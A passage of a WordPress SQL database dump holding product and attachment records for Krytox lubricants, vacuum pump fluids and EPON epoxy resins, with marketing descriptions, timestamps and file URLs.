Initial testing has shown no problems with Teflon™ fluoroplastic resin, Kalrez® perfluoroelastomer parts, Viton™ fluoroelastomer, nitrile, and silicone rubbers. The performance of the soluble additives could degrade at temperatures more than 182 °C (360 °F) over a long period of time.\r\n\r\n<strong>High Vacuum Grease</strong>\r\nKrytox LVP is a high vacuum grease formulated with a special low vapor pressure Krytox oil for high-vacuum applications. It is also useful for sealing laboratory glassware connections and as a thread lubricant/sealant.\r\n', 'VPF 1514', 'Krytox vacuum pump fluids (VPF) are used in applications where conventional vacuum pump oils cause safety, waste disposal, and maintenance problems. They are nonflammable and eliminate the chance of fire in pumps. They are nonreactive and safe to use in oxygen systems.\r\n<br /><br />\r\n<img class="alignright" src="https://www.miller-stephenson.com/wp-content/uploads/2016/09/krytox-authorized-distributor-3-e1474291247159.jpg" alt="Krytox Authorized Distributor" />', 'publish', 'open', 'closed', '', 'krytox-vpf-1514', '', '', '2016-10-05 12:44:59', '2016-10-05 12:44:59', '', 0, 'https://132.148.10.86/wordpress/product/1514/', 0, 'product', '', 0); 
INSERT INTO `wp_posts` VALUES (945, 2, '2016-08-29 13:58:25', '2016-08-29 13:58:25', '', 'IMG_1254[1]', '', 'inherit', 'open', 'closed', '', 'img_12541', '', '', '2016-08-29 13:58:25', '2016-08-29 13:58:25', '', 944, 'https://132.148.10.86/wordpress/wp-content/uploads/2016/08/IMG_12541.jpg', 0, 'attachment', 'image/jpeg', 0); 
INSERT INTO `wp_posts` VALUES (946, 3, '2016-08-29 14:26:55', '2016-08-29 14:26:55', '', '1007F', '', 'inherit', 'open', 'closed', '', '1007f', '', '', '2016-08-29 14:26:55', '2016-08-29 14:26:55', '', 941, 'https://132.148.10.86/wordpress/wp-content/uploads/2016/08/1007F.pdf', 0, 'attachment', 'application/pdf', 0); 
INSERT INTO `wp_posts` VALUES (947, 3, '2016-08-29 14:36:36', '2016-08-29 14:36:36', '', 'EPON Novolac resins', '', 'inherit', 'open', 'closed', '', 'epon-novolac-resins', '', '', '2016-08-29 14:36:36', '2016-08-29 14:36:36', '', 0, 'https://132.148.10.86/wordpress/wp-content/uploads/2016/08/EPON-Novolac-resins.jpg', 0, 'attachment', 'image/jpeg', 0); 
INSERT INTO `wp_posts` VALUES (948, 3, '2016-08-29 14:41:27', '2016-08-29 14:41:27', '', 'EPON™ 1031', 'EPON Resin 1031 is a solid, novolac-free multifunctional epoxy resin. It is most frequently used to improve the properties of cured epoxy resin systems particularly at elevated temperatures. It finds applications in electrical laminates, high performance aerospace composites and adhesives, powder coatings, and molding compounds. The use of EPON Resin 1031 in epoxy formulations increases the crosslink density of cured systems and, subsequently, raises the glass transition temperature. At elevated temperatures, such systems have greater strength and rigidity and show improved moisture resistance and retention of electrical properties. EPON Resin 1031 also provides the fluorescence and UV blocking\r\nproperties often required for printed wiring board applications.  Benefit include:\r\n<ul>\r\n 	<li>An average of greater than three reactive groups per molecule</li>\r\n 	<li>Low saponifiable chloride content; Low ionic contaminants</li>\r\n 	<li>Low melt viscosity</li>\r\n 	<li>Optical fluorescence; Strong absorbance of UV light</li>\r\n 	<li>Easily ground into uniform particle size</li>\r\n 	<li>Good storage stability</li>\r\n</ul>', 'publish', 'open', 'closed', '', 'epon-1031', '', '', '2016-09-21 14:56:43', '2016-09-21 14:56:43', '', 0, 'https://132.148.10.86/wordpress/?post_type=product&#038;p=948', 0, 'product', '', 0); 
INSERT INTO `wp_posts` VALUES (949, 3, '2016-08-29 14:40:37', '2016-08-29 14:40:37', '', '1031', '', 'inherit', 'open', 'closed', '', '1031', '', '', '2016-08-29 14:40:37', '2016-08-29 14:40:37', '', 948, 'https://132.148.10.86/wordpress/wp-content/uploads/2016/08/1031.pdf', 0, 'attachment', 'application/pdf', 0); 
INSERT INTO `wp_posts` VALUES (950, 3, '2016-08-29 14:51:51', '2016-08-29 14:51:51', '', 'IMG_1256[1]', '', 'inherit', 'open', 'closed', '', 'img_12561', '', '', '2016-08-29 14:51:51', '2016-08-29 14:51:51', '', 943, 'https://132.148.10.86/wordpress/wp-content/uploads/2016/08/IMG_12561.jpg', 0, 'attachment', 'image/jpeg', 0); 
INSERT INTO `wp_posts` VALUES (951, 3, '2016-08-29 14:52:07', '2016-08-29 14:52:07', '', 'IMG_1255[1]', '', 'inherit', 'open', 'closed', '', 'img_12551', '', '', '2016-08-29 14:52:07', '2016-08-29 14:52:07', '', 943, 'https://132.148.10.86/wordpress/wp-content/uploads/2016/08/IMG_12551.jpg', 0, 'attachment', 'image/jpeg', 0); 
INSERT INTO `wp_posts` VALUES (952, 3, '2016-08-29 15:17:52', '2016-08-29 15:17:52', '', 'EPON™ SU-8', 'EPON™ Resin SU-8 is a polymeric solid epoxy novolac resin possessing an average epoxide group functionality around eight. EPON SU-8 is compatible with bisphenol A-based epoxy resins, imparting improved high temperature strength, thermal stability, reactivity and chemical resistance. Prepreg laminates and graphite or boron reinforced composites with EPON SU-8 attain the maximum strength retention and thermal stability possible for an epoxy matrix system at elevated temperatures. Epoxy molding powders prepared with EPON SU-8 are characterized by an outstanding combination of flow stability and short press cycles. Benefits include:\r\n<ul>\r\n 	<li>Long shelf life</li>\r\n 	<li>Micropulverized at ambient temperatures</li>\r\n 	<li>Rapid development of hot hardness</li>\r\n 	<li>Maximum elevated temperature strength retention</li>\r\n 	<li>Improved tack qualities and lateral cohesiveness of unidirectional tapes</li>\r\n</ul>', 'publish', 'open', 'closed', '', 'epon-su-8', '', '', '2016-09-21 15:03:10', '2016-09-21 15:03:10', '', 0, 'https://132.148.10.86/wordpress/?post_type=product&#038;p=952', 0, 'product', '', 0); 
INSERT INTO `wp_posts` VALUES (953, 3, '2016-08-29 15:16:57', '2016-08-29 15:16:57', '', 'Su 8', '', 'inherit', 'open', 'closed', '', 'su-8', '', '', '2016-08-29 15:16:57', '2016-08-29 15:16:57', '', 952, 'https://132.148.10.86/wordpress/wp-content/uploads/2016/08/Su-8.pdf', 0, 'attachment', 'application/pdf', 0); 
INSERT INTO `wp_posts` VALUES (954, 2, '2016-08-29 15:17:50', '2016-08-29 15:17:50', 'Krytox VPF 1525, vacuum pump fluids are used in applications where conventional vacuum pump oils cause safety, waste disposal, and maintenance problems. They are nonflammable and eliminate the chance of fire in pumps. They are nonreactive and safe to use in oxygen systems. They can replace competitive PFPE fluids as well as any other type of vacuum fluid. Krytox™ fluids do not contain acetal groups, which are susceptible to attack by Lewis acids. This gives Krytox™ superior stability as a vacuum pump fluid. Krytox vacuum fluids are precisely distilled to provide low vapor pressures and superior performance. In addition, Krytox fluids are recyclable.\r\n\r\nWhile Krytox VPF 1525 fluids are inert and non-reactive to all elastomers, plastics, and metals, the soluble additives in Krytox™ XP products have not been tested with all materials. Initial testing has shown no problems with Teflon™ fluoroplastic resin, Kalrez® perfluoroelastomer parts, Viton™ fluoroelastomer, nitrile, and silicone rubbers. The performance of the soluble additives could degrade at temperatures more than 182 °C (360 °F) over a long period of time.\r\n\r\n<strong>High Vacuum Grease</strong>\r\nKrytox LVP is a high vacuum grease formulated with a special low vapor pressure Krytox oil for high-vacuum applications. It is also useful for sealing laboratory glassware connections and as a thread lubricant/sealant.\r\n', 'VPF 1525', 'Krytox vacuum pump fluids (VPF) are used in applications where conventional vacuum pump oils cause safety, waste disposal, and maintenance problems. They are nonflammable and eliminate the chance of fire in pumps. They are nonreactive and safe to use in oxygen systems. \r\n<br /><br />\r\nMost viscous of the VPF series. \r\n<br /><br />\r\n<img class="alignright" src="https://www.miller-stephenson.com/wp-content/uploads/2016/09/krytox-authorized-distributor-3-e1474291247159.jpg" alt="Krytox Authorized Distributor" />', 'publish', 'open', 'closed', '', 'krytox-vpf-1525', '', '', '2016-10-05 12:45:47', '2016-10-05 12:45:47', '', 0, 'https://132.148.10.86/wordpress/product/1525/', 0, 'product', '', 0); 
INSERT INTO `wp_posts` VALUES (955, 3, '2016-08-29 16:17:15', '2016-08-29 16:17:15', '', 'EPON™ 164', 'EPON™ Resin 164 is a solid multifunctional epichlorohydrin/cresol novolac epoxy resin (see molecular structure). It combines the high thermal stability of the novolac backbone with the versatility, reactivity, and chemical resistance of epoxy resins. It is used where improved properties of cured epoxy resin systems are needed, particularly at elevated temperature and where stability of electrical properties under humid conditions are required. It finds application in electrical laminates, molding compounds, high performance aerospace composites, high temperature adhesives, powder coatings, and tooling. Benefits include:\r\n<ul>\r\n 	<li>An average of five reactive epoxide groups per molecule</li>\r\n 	<li>Low ionic contaminants; Low saponifiable chloride</li>\r\n 	<li>Easily ground into uniform particle size</li>\r\n 	<li>Low melt viscosity</li>\r\n 	<li>Stability on storage</li>\r\n</ul>', 'publish', 'open', 'closed', '', 'epon-164', '', '', '2016-09-23 17:08:44', '2016-09-23 17:08:44', '', 0, 'https://132.148.10.86/wordpress/?post_type=product&#038;p=955', 0, 'product', '', 0); 
INSERT INTO `wp_posts` VALUES (956, 2, '2016-08-29 15:52:23', '2016-08-29 15:52:23', '', '157 FSH', 'Like the other Krytox fluorinated oils, Krytox 157 FS lubricant is insoluble in most common organic solvents. It is also nonflammable. Decarboxylation occurs on heating above about 170 °C (338 °F) and becomes vigorous at 200 °C (392 °F). The product formed appears to be a mixture, but is mainly a hydro-endcapped version of Krytox fluorinated oil. The decarboxylation of its alkali metal salts in the presence of water occurs at lower temperatures and yields essentially pure polymers end capped with hydrogen.\r\n<br /><br />\r\n<img class="alignright" src="https://www.miller-stephenson.com/wp-content/uploads/2016/09/krytox-authorized-distributor-3-e1474291247159.jpg" alt="Krytox Authorized Distributor" />', 'publish', 'open', 'closed', '', '157-fsh', '', '', '2016-09-19 14:44:35', '2016-09-19 14:44:35', '', 0, 'https://132.148.10.86/wordpress/?post_type=product&#038;p=956', 0, 'product', '', 0); 
INSERT INTO `wp_posts` VALUES (957, 2, '2016-08-29 15:51:30', '2016-08-29 15:51:30', 'vertrel fluids', 'krytox-surfactant-1-oil-fsh', 'vertrel fluids', 'inherit', 'open', 'closed', '', 'krytox-surfactant-1-oil-fsh', '', '', '2016-09-30 11:49:36', '2016-09-30 11:49:36', '', 956, 'https://132.148.10.86/wordpress/wp-content/uploads/2016/08/krytox-surfactant-1-oil-fsh.jpg', 0, 'attachment', 'image/jpeg', 0); 
INSERT INTO `wp_posts` VALUES (958, 2, '2016-08-29 15:51:44', '2016-08-29 15:51:44', '', 'krytox-surfactant-2-oil-fsh', '', 'inherit', 'open', 'closed', '', 'krytox-surfactant-2-oil-fsh', '', '', '2016-08-29 15:51:44', '2016-08-29 15:51:44', '', 956, 'https://132.148.10.86/wordpress/wp-content/uploads/2016/08/krytox-surfactant-2-oil-fsh.jpg', 0, 'attachment', 'image/jpeg', 0); 
INSERT INTO `wp_posts` VALUES (959, 2, '2016-08-29 15:51:53', '2016-08-29 15:51:53', '', 'krytox-surfactant-2-oil-fsl', '', 'inherit', 'open', 'closed', '', 'krytox-surfactant-2-oil-fsl', '', '', '2016-08-29 15:51:53', '2016-08-29 15:51:53', '', 956, 'https://132.148.10.86/wordpress/wp-content/uploads/2016/08/krytox-surfactant-2-oil-fsl.jpg', 0, 'attachment', 'image/jpeg', 0); 
INSERT INTO `wp_posts` VALUES (960, 2, '2016-08-29 15:53:37', '2016-08-29 15:53:37', '', '157 FSL', 'Like the other Krytox fluorinated oils, Krytox 157 FS lubricant is insoluble in most common organic solvents. It is also nonflammable. Decarboxylation occurs on heating above about 170 °C (338 °F) and becomes vigorous at 200 °C (392 °F). The product formed appears to be a mixture, but is mainly a hydro-endcapped version of Krytox fluorinated oil. The decarboxylation of its alkali metal salts in the presence of water occurs at lower temperatures and yields essentially pure polymers end capped with hydrogen.\r\n<br /><br />\r\n<img class="alignright" src="https://www.miller-stephenson.com/wp-content/uploads/2016/09/krytox-authorized-distributor-3-e1474291247159.jpg" alt="Krytox Authorized Distributor" />', 'publish', 'open', 'closed', '', '157-fsl', '', '', '2016-09-19 14:45:43', '2016-09-19 14:45:43', '', 0, 'https://132.148.10.86/wordpress/product/157-fsl/', 0, 'product', '', 0); 
INSERT INTO `wp_posts` VALUES (961, 2, '2016-08-29 15:56:43', '2016-08-29 15:56:43', '', 'krytox-industrial-grease-oil', '', 'inherit', 'open', 'closed', '', 'krytox-industrial-grease-oil', '', '', '2016-08-29 15:56:43', '2016-08-29 15:56:43', '', 0, 'https://132.148.10.86/wordpress/wp-content/uploads/2016/08/krytox-industrial-grease-oil.jpg', 0, 'attachment', 'image/jpeg', 0); 
INSERT INTO `wp_posts` VALUES (962, 3, '2016-08-29 16:16:28', '2016-08-29 16:16:28', '', 'EPON 164', '', 'inherit', 'open', 'closed', '', '164', '', '', '2016-08-29 16:16:43', '2016-08-29 16:16:43', '', 955, 'https://132.148.10.86/wordpress/wp-content/uploads/2016/08/164.pdf', 0, 'attachment', 'application/pdf', 0); 
INSERT INTO `wp_posts` VALUES (963, 3, '2016-08-29 16:30:26', '2016-08-29 16:30:26', '', 'EPONEX UV resistance', '', 'inherit', 'open', 'closed', '', 'eponex-uv-resistance', '', '', '2016-08-29 16:30:26', '2016-08-29 16:30:26', '', 0, 'https://132.148.10.86/wordpress/wp-content/uploads/2016/08/EPONEX-UV-resistance.jpg', 0, 'attachment', 'image/jpeg', 0); 
INSERT INTO `wp_posts` VALUES (964, 3, '2016-08-29 16:51:32', '2016-08-29 16:51:32', '', 'EPOXY polyacrylates', '', 'inherit', 'open', 'closed', '', 'epoxy-polyacrylates', '', '', '2016-08-29 16:51:32', '2016-08-29 16:51:32', '', 0, 'https://132.148.10.86/wordpress/wp-content/uploads/2016/08/EPOXY-polyacrylates.jpg', 0, 'attachment', 'image/jpeg', 0); 
INSERT INTO `wp_posts` VALUES (965, 2, '2016-08-29 16:58:24', '2016-08-29 16:58:24', '', 'Krytox EG 2000', '', 'inherit', 'open', 'closed', '', 'krytox-electronic-grease', '', '', '2016-09-28 12:36:10', '2016-09-28 12:36:10', '', 0, 'https://132.148.10.86/wordpress/wp-content/uploads/2016/08/Krytox-electronic-grease.jpg', 0, 'attachment', 'image/jpeg', 0); 
INSERT INTO `wp_posts` VALUES (966, 2, '2016-08-29 16:58:39', '2016-08-29 16:58:39', '', 'krytox-electronic-grease-electric', '', 'inherit', 'open', 'closed', '', 'krytox-electronic-grease-electric', '', '', '2016-08-29 16:58:39', '2016-08-29 16:58:39', '', 0, 'https://132.148.10.86/wordpress/wp-content/uploads/2016/08/krytox-electronic-grease-electric.jpg', 0, 'attachment', 'image/jpeg', 0); 
INSERT INTO `wp_posts` VALUES (967, 2, '2016-08-29 17:49:33', '2016-08-29 17:49:33', '', 'EG 2000', 'Krytox greases for Electronics. These greases are non-reactive and non-flammable. They have the same properties as the 143 series oil but thickened into a grease form.\r\n<br /><br />\r\nLowest viscosity grease in the EG Series. \r\n<br /><br />\r\n<img class="alignright" src="https://www.miller-stephenson.com/wp-content/uploads/2016/09/krytox-authorized-distributor-3-e1474291247159.jpg" alt="Krytox Authorized Distributor" />', 'publish', 'open', 'closed', '', 'krytox-eg-2000', '', '', '2016-09-28 12:36:19', '2016-09-28 12:36:19', '', 0, 'https://132.148.10.86/wordpress/?post_type=product&#038;p=967', 0, 'product', '', 0); 
INSERT INTO `wp_posts` VALUES (968, 2, '2016-08-29 17:51:16', '2016-08-29 17:51:16', '', 'EG 3000', 'Krytox greases for Electronics. These greases are non-reactive and non-flammable. They have the same properties as the 143 series oil but thickened into a grease form.\r\n<br /><br />\r\nHighest viscosity grease in the EG series.\r\n<br /><br />\r\n<img class="alignright" src="https://www.miller-stephenson.com/wp-content/uploads/2016/09/krytox-authorized-distributor-3-e1474291247159.jpg" alt="Krytox Authorized Distributor" />', 'publish', 'open', 'closed', '', 'krytox-eg-3000', '', '', '2016-09-28 12:37:49', '2016-09-28 12:37:49', '', 0, 'https://132.148.10.86/wordpress/product/eg-3000/', 0, 'product', '', 0); 
INSERT INTO `wp_posts` VALUES (969, 2, '2016-08-29 17:51:48', '2016-08-29 17:51:48', '', 'Krytox EG 3000', '', 'inherit', 'open', 'closed', '', 'krytox-eg-grease', '', '', '2016-09-28 12:37:40', '2016-09-28 12:37:40', '', 968, 'https://132.148.10.86/wordpress/wp-content/uploads/2016/08/krytox-eg-grease.jpg', 0, 'attachment', 'image/jpeg', 0); 
INSERT INTO `wp_posts` VALUES (970, 3, '2016-08-29 18:16:11', '2016-08-29 18:16:11', '', 'EPON™ 8021', 'EPON™ Resin 8021 is a very low viscosity resin possessing excellent wetting characteristics and rapid reaction rates with aliphatic amine curing agents over a broad temperature range. This combination of properties makes EPON 8021 an excellent choice for use in adhesives for bonding difficult-to-wet substrates, low temperature applied flooring compounds, rapid setting sealing compounds, and pressure injection systems. The excellent wetting characteristics of this resin are readily apparent when applied in bondline thicknesses to metal, plastic, damp concrete, and other difficult-to-wet substances. This property is manifest in exceptionally high bond strength to many such materials.', 'publish', 'open', 'closed', '', 'epon-8021', '', '', '2016-09-21 14:58:32', '2016-09-21 14:58:32', '', 0, 'https://132.148.10.86/wordpress/?post_type=product&#038;p=970', 0, 'product', '', 0); 
INSERT INTO `wp_posts` VALUES (971, 3, '2016-08-29 18:15:37', '2016-08-29 18:15:37', '', '8021', '', 'inherit', 'open', 'closed', '', '8021', '', '', '2016-08-29 18:15:37', '2016-08-29 18:15:37', '', 970, 'https://132.148.10.86/wordpress/wp-content/uploads/2016/08/8021.pdf', 0, 'attachment', 'application/pdf', 0); 
INSERT INTO `wp_posts` VALUES (973, 2, '2016-08-29 18:41:56', '2016-08-29 18:41:56', 'Krytox FPG 182 has exceptional performance as shown by its bearing life test that has over 7 times the life of similar products. It is a perfluoropolyether (PFPE)-based grease thickened with a special high performance PTFE thickener, and has exceptional chemical and oxygen resistance. It is designed to operate under severe conditions, and can be used for bearings, gears, and as a lubricant for O-rings and elastomers.\r\n\r\n<strong>Storage and Handling</strong>\r\nShelf life: Indefinite shelf life in unopened container. It is normal for oil to separate from grease during storage. Before use, knead tubes or stir larger containers to remix.\r\n\r\n<strong>Product Package</strong>\r\nKrytox FPG 182 is available in 50 and 100 g syringes, 8 oz tubes, and 1.76 lb cartridges.', 'FPG 182', 'Krytox FPG 182 is a smooth, buttery white grease. It has been specifically developed to operate over a wide temperature service range and in extreme chemical and vacuum conditions. It has exceptional performance as shown by its bearing life test that has over 7 times the life of similar products. \r\n<br /><br />\r\n<img class="alignright" src="https://www.miller-stephenson.com/wp-content/uploads/2016/09/krytox-authorized-distributor-3-e1474291247159.jpg" alt="Krytox Authorized Distributor" />\r\n', 'publish', 'open', 'closed', '', 'krytox-fpg-182', '', '', '2017-08-21 18:05:29', '2017-08-21 18:05:29', '', 0, 'https://132.148.10.86/wordpress/?post_type=product&#038;p=973', 0, 'product', '', 0); 
INSERT INTO `wp_posts` VALUES (974, 2, '2016-08-29 18:28:11', '2016-08-29 18:28:11', '', 'krytox-fpg-028', '', 'inherit', 'open', 'closed', '', 'krytox-fpg-028', '', '', '2016-08-29 18:28:11', '2016-08-29 18:28:11', '', 973, 'https://132.148.10.86/wordpress/wp-content/uploads/2016/08/krytox-fpg-028.jpg', 0, 'attachment', 'image/jpeg', 0); 
INSERT INTO `wp_posts` VALUES (975, 2, '2016-08-29 18:28:22', '2016-08-29 18:28:22', '', 'krytox-fpg-128', '', 'inherit', 'open', 'closed', '', 'krytox-fpg-128', '', '', '2016-08-29 18:28:22', '2016-08-29 18:28:22', '', 973, 'https://132.148.10.86/wordpress/wp-content/uploads/2016/08/krytox-fpg-128.jpg', 0, 'attachment', 'image/jpeg', 0); 
INSERT INTO `wp_posts` VALUES (976, 3, '2016-08-29 18:30:26', '2016-08-29 18:30:26', '', 'Elastomer EPOXY', '', 'inherit', 'open', 'closed', '', 'elastomer-epoxy', '', '', '2016-08-29 18:30:26', '2016-08-29 18:30:26', '', 0, 'https://132.148.10.86/wordpress/wp-content/uploads/2016/08/Elastomer-EPOXY.jpg', 0, 'attachment', 'image/jpeg', 0); 
INSERT INTO `wp_posts` VALUES (977, 3, '2016-08-29 18:34:41', '2016-08-29 18:34:41', '', 'EPON™ 58005', 'EPON™ Resin 58005 is an elastomer modified epoxy functional adduct formed from the reaction of the diglycidyl ether of bisphenol A and a carboxyl terminated butadiene-acrylonitrile elastomer. Elastomer content is approximately 40% by weight. Primary use of EPON 58005 is the modification of conventional epoxy systems to increase flexibility, adhesion properties and fatigue resistance. Benefits include:\r\n<ul>\r\n 	<li>High elastomer content – convenient adjustment of elastomer content</li>\r\n 	<li>Compatible with a wide range of liquid epoxy resins</li>\r\n 	<li>Imparts improved peel strength and fatigue resistance with minimal reduction of stiffness and maximum operating temperature</li>\r\n</ul>', 'publish', 'open', 'closed', '', 'epon-58005', '', '', '2016-09-21 15:02:13', '2016-09-21 15:02:13', '', 0, 'https://132.148.10.86/wordpress/?post_type=product&#038;p=977', 0, 'product', '', 0); 
INSERT INTO `wp_posts` VALUES (978, 3, '2016-08-29 18:34:03', '2016-08-29 18:34:03', '', '58005', '', 'inherit', 'open', 'closed', '', '58005', '', '', '2016-08-29 18:34:03', '2016-08-29 18:34:03', '', 977, 'https://132.148.10.86/wordpress/wp-content/uploads/2016/08/58005.pdf', 0, 'attachment', 'application/pdf', 0); 
INSERT INTO `wp_posts` VALUES (979, 3, '2016-08-29 18:53:30', '0000-00-00 00:00:00', '', '', '<p><br data-mce-bogus="1"></p>', 'draft', 'open', 'closed', '', '', '', '', '2016-08-29 18:53:30', '2016-08-29 18:53:30', '', 0, 'https://132.148.10.86/wordpress/?post_type=product&#038;p=979', 0, 'product', '', 0); 
INSERT INTO `wp_posts` VALUES (980, 2, '2016-08-29 18:40:14', '2016-08-29 18:40:14', '', 'C10684_Krytox_FPG_028 (002)', '', 'inherit', 'open', 'closed', '', 'c10684_krytox_fpg_028-002', '', '', '2016-08-29 18:40:14', '2016-08-29 18:40:14', '', 973, 'https://132.148.10.86/wordpress/wp-content/uploads/2016/08/C10684_Krytox_FPG_028-002.pdf', 0, 'attachment', 'application/pdf', 0); 
INSERT INTO `wp_posts` VALUES (981, 2, '2016-08-29 18:40:17', '2016-08-29 18:40:17', '', 'C10685_Krytox_FPG_182 (002)', '', 'inherit', 'open', 'closed', '', 'c10685_krytox_fpg_182-002', '', '', '2016-08-29 18:40:17', '2016-08-29 18:40:17', '', 973, 'https://132.148.10.86/wordpress/wp-content/uploads/2016/08/C10685_Krytox_FPG_182-002.pdf', 0, 'attachment', 'application/pdf', 0); 
INSERT INTO `wp_posts` VALUES (982, 2, '2016-08-29 18:40:19', '2016-08-29 18:40:19', '', 'C-10685_Krytox_FPG_182 Group 062716', '', 'inherit', 'open', 'closed', '', 'c-10685_krytox_fpg_182-group-062716', '', '', '2016-08-29 18:40:19', '2016-08-29 18:40:19', '', 973, 'https://132.148.10.86/wordpress/wp-content/uploads/2016/08/C-10685_Krytox_FPG_182-Group-062716.jpg', 0, 'attachment', 'image/jpeg', 0); 
INSERT INTO `wp_posts` VALUES (983, 2, '2016-08-29 18:40:22', '2016-08-29 18:40:22', '', 'Chemours Krytox Grease 30 g Syringe Horz 300 dpi (002)', '', 'inherit', 'open', 'closed', '', 'chemours-krytox-grease-30-g-syringe-horz-300-dpi-002', '', '', '2016-08-29 18:40:22', '2016-08-29 18:40:22', '', 973, 'https://132.148.10.86/wordpress/wp-content/uploads/2016/08/Chemours-Krytox-Grease-30-g-Syringe-Horz-300-dpi-002.jpg', 0, 'attachment', 'image/jpeg', 0); 
INSERT INTO `wp_posts` VALUES (984, 2, '2016-08-29 18:42:55', '2016-08-29 18:42:55', '<h1>Krytox FPG 028</h1>\r\nKrytox FPG 028 is a smooth, buttery, perfluoropolyether (PFPE)-based white grease thickened with a special, high-performance polytetrafluoroethylene (PTFE) thickener. It was developed to operate over a wide temperature range (–73 to 204 °C; –99 to 399 °F)) and to be resistant to hydrocarbon fuel, liquid oxygen and a variety of other chemicals. Krytox™ FPG 028 operates well under severe conditions and can be used for bearings and gears, and as a lubricant for O-rings and elastomers. The Department of Defense’s Defense Logistics Agency (DLA) has assigned Commercial and Government Entity (CAGE) Code 7GFT8 to The Chemours Company.\r\n\r\n<strong>Storage and Handling</strong>\r\n\r\nDoes not oxidize or degrade from atmospheric contact. Life of uncontaminated product in reclosed container is undiminished. Indefinite shelf life in unopened container. It is normal for oil to separate from grease during storage. Before use, knead tubes or stir larger containers to remix.\r\n\r\n<strong>Product Package</strong>\r\n\r\nKrytox FPG 028 is available in 50 and 100 g syringes, 8 oz tubes, and 1.76 lb cartridges.\r\n\r\n<a href="https://www.miller-stephenson.com/krytox-fpg-028-performance-lubricant/">Learn more here.</a>', 'FPG 028', 'Krytox FPG 028 is a smooth, buttery white grease. It has been specifically developed to operate over a wide temperature service range, –73 to 204 °C (–99 to 399 °F), to be resistant to hydrocarbon fuel and liquid oxygen, and to be used as a lubricant in aircraft, aerospace vehicles, and supporting equipment.\r\n<br /><br />\r\n<img class="alignright" src="https://www.miller-stephenson.com/wp-content/uploads/2016/09/krytox-authorized-distributor-3-e1474291247159.jpg" alt="Krytox Authorized Distributor" />', 'publish', 'open', 'closed', '', 'krytox-fpg-028', '', '', '2016-11-10 15:35:30', '2016-11-10 15:35:30', '', 0, 'https://132.148.10.86/wordpress/product/fpg-182-copy/', 0, 'product', '', 0); 
INSERT INTO `wp_posts` VALUES (985, 2, '2016-08-29 18:54:51', '2016-08-29 18:54:51', '', 'krytox-fpg-grease', '', 'inherit', 'open', 'closed', '', 'krytox-fpg-grease', '', '', '2016-08-29 18:54:51', '2016-08-29 18:54:51', '', 0, 'https://132.148.10.86/wordpress/wp-content/uploads/2016/08/krytox-fpg-grease.jpg', 0, 'attachment', 'image/jpeg', 0); 
INSERT INTO `wp_posts` VALUES (986, 3, '2016-08-29 19:33:27', '2016-08-29 19:33:27', '', 'EPONEX™ 1510', 'EPONEX™ Resins are unique low viscosity epoxy resins designed to have improved performance compared to conventional bisphenol-A (BPA) type resins, when formulated properly. EPONEX Resin 1510 is recommended as a building block resin for preparations of: 1) low viscosity/higher molecular weight epoxide resins (e.g. by reaction with bisphenol-A) and 2) low viscosity esters using conventional esterification reactants. It can also be used as a reactive viscosity reducer and a modifier for improved color in BPA-based epoxy resins. Benefits include:\r\n<ul>\r\n 	<li>Low viscosity</li>\r\n 	<li>Light color</li>\r\n 	<li>Improved yellowing and chalking resista</li>\r\n 	<li>Very good profile of mechanical properties</li>\r\n</ul>', 'publish', 'open', 'closed', '', 'eponex-1510', '', '', '2016-09-21 15:30:42', '2016-09-21 15:30:42', '', 0, 'https://132.148.10.86/wordpress/?post_type=product&#038;p=986', 0, 'product', '', 0); 
INSERT INTO `wp_posts` VALUES (987, 3, '2016-08-29 19:32:30', '2016-08-29 19:32:30', '', '1510', '', 'inherit', 'open', 'closed', '', '1510', '', '', '2016-08-29 19:32:30', '2016-08-29 19:32:30', '', 986, 'https://132.148.10.86/wordpress/wp-content/uploads/2016/08/1510.pdf', 0, 'attachment', 'application/pdf', 0); 
INSERT INTO `wp_posts` VALUES (988, 2, '2016-08-30 12:24:07', '2016-08-30 12:24:07', '', 'krytox-thread-sealant', '', 'inherit', 'open', 'closed', '', 'krytox-thread-sealant', '', '', '2016-08-30 12:24:07', '2016-08-30 12:24:07', '', 0, 'https://132.148.10.86/wordpress/wp-content/uploads/2016/08/krytox-thread-sealant.png', 0, 'attachment', 'image/png', 0); 
INSERT INTO `wp_posts` VALUES (989, 2, '2016-08-30 12:44:42', '2016-08-30 12:44:42', '<h2>Krytox TS4 Thread Sealant</h2>\r\n<h3>Superior Performance, Unmatched Chemical and Corrosion Resistance, Direct replacement for Teflon™ Tape</h3>\r\nKrytox TS4 Thread Sealant (TS4) is unlike PTFE tape, which should be removed before re-application. Krytox TS4 Thread Sealant can be re-applied over existing Krytox thread sealant. Clings to threads and will not shred or tear on assembly/disassembly.Cannot plug or restrict critical piping, valves, or instruments like tape solids. Krytox™ TS4 is non-reactive, non-toxic, nonflammable, non-corrosive and compatible with most seal, O-ring, and valve polymers. No VOC content or hydrocarbon in the product; safe for oxygen use with no auto-ignition temperatures. Tested leak free under helium at 400 psi for 7 days.* Safe for use: The Chlorine Institute (Pamphlet 164) rates Krytox lubricants a “1”. Lubricates threads, preventing costly thread damage from galling and seizing during assembly. Allows low breakaway torque for easy-to-break connections.\r\n<h3>Krytox TS4 Thread Sealant - Provides Superior Sealing for all Threaded Pipes</h3>\r\nKrytox TS4 was designed from its inception to have higher performance and be safer and easier to use than standard Teflon Tape. Utilizing over 60 years of thread sealant experience, our new TS4 was developed to perform where other sealants fail.  Higher pressure, corrosive environments are the ideal application of our TS4 sealant. Traditionally, PTFE (Teflon™) tape is used to seal valves, actuators, pipe fittings and fasteners.  Krytox™ TS4 PFPE sealant provides the highest securing performance for water, air, steam, natural gas, reactive gases and liquids without the drawbacks of tapes. PTFE tapes can result in costly thread damage during assembly due to galling and seizure.  Krytox™ TS4 provides for low breakaway torque for easy-to-break connections.  Additionally, TS4 is a cost effective solution when compared to like chemistries and products, such as Halocarbon Grease, Fluorolube Grease, Lox-8 Paste or PTFE tape as only a minor amount is needed per application.\r\n<h4>Want to test this product? Click here for a free sample</h4>\r\nAs seen in the video below Krytox TS4 performs in the most extreme environments and offers superior performance.\r\n\r\nhttps://www.youtube.com/watch?v=XxJbQOWtIG0', 'Krytox TS4 Thread Sealant', 'Traditionally, PTFE (Teflon™) tape is used to seal valves, actuators, pipe fittings and fasteners.  Krytox™ TS4 PFPE sealant provides the highest securing performance for water, air, steam, natural gas, reactive gases and liquids without the drawbacks of tapes. Thread sealant (TS4) is unlike PTFE tape, which should be removed before re-application. Krytox TS4 can be re-applied over existing Krytox thread sealant. Clings to threads and will not shred or tear on assembly/disassembly. Benefit include:\r\n<ul>\r\n 	<li>Superior to Teflon™ Tape</li>\r\n 	<li>Cannot plug or restrict critical piping, 